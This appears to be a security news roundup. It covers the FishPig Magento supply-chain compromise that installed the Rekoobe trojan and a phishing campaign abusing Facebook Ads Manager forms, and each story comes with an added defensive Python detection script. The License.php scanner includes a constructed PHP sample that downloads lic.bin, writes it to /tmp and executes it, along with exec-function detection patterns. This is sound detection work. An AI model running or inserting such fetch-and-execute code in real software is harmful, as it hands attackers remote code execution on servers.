
Malware Spreads Through FishPig Distribution Server to Infect Magento-Powered Stores


For several weeks, Magento stores have been infected with malware as a result of a supply chain attack on the FishPig distribution server. FishPig specialises in Magento optimizations and Magento-WordPress integrations, and its Magento extensions have received over 200,000 downloads. FishPig issued a warning on Tuesday about an intrusion into its extension licence system that resulted in a threat actor injecting malicious PHP code into the Helper/License.php file. 

“This file is included in most FishPig extensions so it is best to assume that all FishPig modules had been infected,” FishPig announced.

According to the company, the attackers have likely had access to its servers since at least August 6. Sansec, the security researchers who discovered the intrusion, report that the injected code installs a second piece of malware called Rekoobe, which hides as a background process on the compromised server.

Sansec further said that the malicious code injected into License.php downloads a Linux binary from license.fishpig.co.uk every time the FishPig control panel is opened in the Magento backend. The downloaded file, named 'lic.bin', is made to look like a licence asset, but it is actually the Rekoobe remote access trojan.

After execution the trojan removes its files from the infected machine but stays resident in memory, impersonating a system service while waiting for instructions from its command-and-control (C&C) server, according to the researchers. FishPig says the malicious code has been removed from its servers and that all modules have been updated.

“It is recommended to upgrade all FishPig modules or reinstall existing versions from the source, regardless of whether or not you are using extensions known to be infected. This will ensure clean and secure code on your system,” FishPig announced.
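The report gives two concrete indicators for the backdoored Helper/License.php: the payload name lic.bin and a download from license.fishpig.co.uk followed by execution. The scanner below is an added example written for this page, not FishPig's or Sansec's code; it walks a Magento tree for FishPig License.php files and flags those indicators. The PHP function-name lists are a generic heuristic chosen here, not a published signature, and both sample sources are constructed to mimic the described behaviour, not the real payload. A clean License.php may legitimately contact the licence host, so the host name alone is reported as context rather than as a finding.

```python
"""Heuristic scan for the backdoored FishPig Helper/License.php described above."""
import re
from pathlib import Path
from typing import Dict, List

# Indicators taken from the report: the injected code fetched a binary named
# lic.bin from license.fishpig.co.uk. A clean License.php may also talk to that
# host for ordinary licence checks, so the host is only reported as INFO; the
# payload name and the fetch -> write -> execute pattern are what count as
# suspicious. The function-name lists are a heuristic chosen for this example.
LICENSE_HOST = "license.fishpig.co.uk"
PAYLOAD_NAME = "lic.bin"
FETCH_CALLS = re.compile(r"\b(curl_exec|file_get_contents|fopen|fsockopen)\s*\(", re.I)
WRITE_CALLS = re.compile(r"\b(file_put_contents|fwrite|chmod)\s*\(", re.I)
EXEC_CALLS = re.compile(
    r"\b(exec|shell_exec|system|passthru|proc_open|popen|pcntl_exec)\s*\(", re.I
)


def scan_source(src: str) -> List[str]:
    """Return the indicators found in one PHP source string, most severe first."""
    hits: List[str] = []
    if PAYLOAD_NAME in src:
        hits.append(f"SUSPICIOUS: references payload name {PAYLOAD_NAME}")
    if FETCH_CALLS.search(src) and WRITE_CALLS.search(src) and EXEC_CALLS.search(src):
        hits.append("SUSPICIOUS: fetches remote content, writes it to disk and executes a command")
    if LICENSE_HOST in src:
        hits.append(f"INFO: contacts {LICENSE_HOST}")
    return hits


def is_suspicious(src: str) -> bool:
    """True when at least one SUSPICIOUS indicator is present."""
    return any(h.startswith("SUSPICIOUS") for h in scan_source(src))


def scan_tree(root: Path) -> Dict[str, List[str]]:
    """Scan every License.php under root (app/code or vendor) whose path mentions FishPig."""
    findings: Dict[str, List[str]] = {}
    for path in root.rglob("License.php"):
        if "fishpig" not in str(path).lower():
            continue
        hits = scan_source(path.read_text(errors="replace"))
        if hits:
            findings[str(path)] = hits
    return findings


# Constructed samples so the script runs stand-alone. CLEAN_SAMPLE mimics an
# ordinary licence check; INJECTED_SAMPLE mimics only the *shape* of the
# behaviour in the report (download lic.bin, drop it, run it). Neither is
# FishPig's real code.
CLEAN_SAMPLE = """<?php
class FishPig_Helper_License {
    public function verify($key) {
        $resp = file_get_contents('https://license.fishpig.co.uk/check?key=' . urlencode($key));
        return json_decode($resp, true);
    }
}
"""

INJECTED_SAMPLE = CLEAN_SAMPLE + """
$bin = file_get_contents('https://license.fishpig.co.uk/lic.bin');
file_put_contents('/tmp/.lic', $bin);
shell_exec('chmod 755 /tmp/.lic; /tmp/.lic');
"""

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN_SAMPLE), ("injected", INJECTED_SAMPLE)):
        print(name, scan_source(sample))
```

Run it against a Magento root with `scan_tree(Path("/var/www/magento"))`. A hit is a reason to follow FishPig's advice and reinstall the modules from source, not a substitute for it; an empty result does not prove the host is clean, since the trojan itself lives in memory after deleting its files.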

Attackers Abuse Facebook Ad Manager in Credential-Harvesting Campaign


Attackers are capitalising on the reach of the Facebook brand by sending emails that appear to come from Facebook Ads Manager. The aim is to trick victims into entering their credentials and credit card details into a Facebook lead-generation form.

According to a report published on Tuesday by Avanan's security research team, attackers are sending phishing messages that pose as urgent warnings from Meta's "Facebook AdManager" team. The messages claim that the victim is violating the company's ad policies and that the ad account will be terminated unless the target appeals the fictitious violation.

The "appeal form" link takes visitors to a credential-harvesting site that collects passwords and credit card information using a real Facebook lead-generation form.

An intriguing aspect of the campaign is that, rather than using a harvesting site hosted on a suspect IP address somewhere, the attackers abuse Facebook's own ads system to create malicious lead-generation forms. This serves two purposes. First, it defeats many of the automated malicious-link checks used by email platforms, because the link genuinely points at Facebook. The Avanan team calls this use of legitimate sites the Static Expressway.

Jeremy Fuchs, cybersecurity researcher for Avanan explained in the report, "Hackers are leveraging sites that appear on static Allow Lists. That means that email security services have broadly decided that these sites are trustworthy, and thus anything related to them comes through to the inbox."

Second, using Facebook Ads forms lends a high degree of realism for advertisers who are already familiar with the Ads Manager platform and the lead-generation forms it produces.

"For the end user, seeing that their Facebook ad account has been suspended is cause for concern," Fuchs said. "Since it’s a legitimate Facebook link, the user would feel confident continuing on."

While the link used in this credential-harvesting campaign is a genuine Facebook page, Fuchs did identify a red flag in the phishing messages: they are typically sent from Outlook accounts such as pageguidelinesfacebook@outlook.com.

The physical address in the email footer is also incorrect. Users who do not notice these details, however, could easily be taken in. According to research published earlier this year, brand impersonations like these, also known as brandjacking, increased by 274% last year as attackers continue to lend their scams credibility by appearing to come from trusted sources. Facebook is a popular brand for phishers to imitate.
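Because the lure links to a real Facebook lead form, URL reputation does not catch it; the usable signals are the ones Fuchs points to, a message that claims the Facebook brand while being sent from an unrelated domain, plus the suspension-and-appeal pressure. The check below is an added example for this page, not Avanan's detection logic. The allowlist of genuine Facebook sending domains is an assumption to be tuned from your own mail logs, and both messages are constructed; the phishing sample reuses the sender address quoted in the report.

```python
"""Brand-impersonation check for the Facebook Ads Manager lure described above."""
import re
from email import message_from_string
from email.message import Message
from email.utils import parseaddr
from typing import Dict, List

# Domains Facebook/Meta genuinely sends notifications from. This list is an
# assumption made for the example; tune it from your own mail logs.
LEGIT_SENDER_DOMAINS = {"facebook.com", "facebookmail.com", "meta.com"}
BRAND_TERMS = re.compile(r"facebook|\bmeta\b|ads?\s*manager", re.I)
PRESSURE_TERMS = re.compile(r"suspend|terminat|disabl|appeal|violat", re.I)


def _text_of(msg: Message) -> str:
    """Concatenate the text/plain parts of a parsed message."""
    if not msg.is_multipart():
        return str(msg.get_payload())
    return " ".join(
        str(part.get_payload())
        for part in msg.walk()
        if part.get_content_type() == "text/plain"
    )


def check_message(raw: str) -> Dict[str, object]:
    """Flag mail that claims to be Facebook but is sent from an unrelated domain.

    The link in the lure is a legitimate facebook.com page, so this check
    deliberately ignores URLs and looks at the sender and the wording instead.
    """
    msg = message_from_string(raw)
    display_name, addr = parseaddr(msg.get("From", ""))
    local_part, _, domain = addr.partition("@")
    domain = domain.lower()
    subject = msg.get("Subject", "")

    claims_brand = bool(BRAND_TERMS.search(f"{display_name} {local_part} {subject}"))
    reasons: List[str] = []
    if claims_brand and domain not in LEGIT_SENDER_DOMAINS:
        reasons.append(f"claims the Facebook brand but is sent from {domain}")
        if PRESSURE_TERMS.search(f"{subject} {_text_of(msg)}"):
            reasons.append("uses account-suspension / appeal pressure")
    return {"from": addr, "suspicious": bool(reasons), "reasons": reasons}


# Constructed samples. PHISH reuses the sender address quoted in the report;
# the body text is invented to match the described lure. LEGIT is a plausible
# genuine notification for comparison.
PHISH = """From: Facebook AdManager <pageguidelinesfacebook@outlook.com>
To: owner@example.com
Subject: Your ad account will be disabled

Your recent ads violate our advertising policies. Appeal within 24 hours
using the form linked below, or your account will be terminated.
"""

LEGIT = """From: Facebook <notification@facebookmail.com>
To: owner@example.com
Subject: Your ad was approved

Your ad is now running.
"""

if __name__ == "__main__":
    for name, sample in (("phish", PHISH), ("legit", LEGIT)):
        print(name, check_message(sample))
```

On the constructed input the phishing message is flagged for both the sender mismatch and the pressure language, while the notification from facebookmail.com passes. In a real gateway, pair this with SPF/DKIM results on the From domain; the check here only models the red flags the report describes.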

According to a Vade report released this spring, Facebook was the most impersonated brand last year, edging out perennial favourite Microsoft for the top spot. Email attacks increased by 48% in the first half of 2022, as per Abnormal Security research, with more than one in ten attacks impersonating well-known brands. So far in 2022, 256 individual brands have been impersonated, with LinkedIn and Microsoft appearing to be the favourites.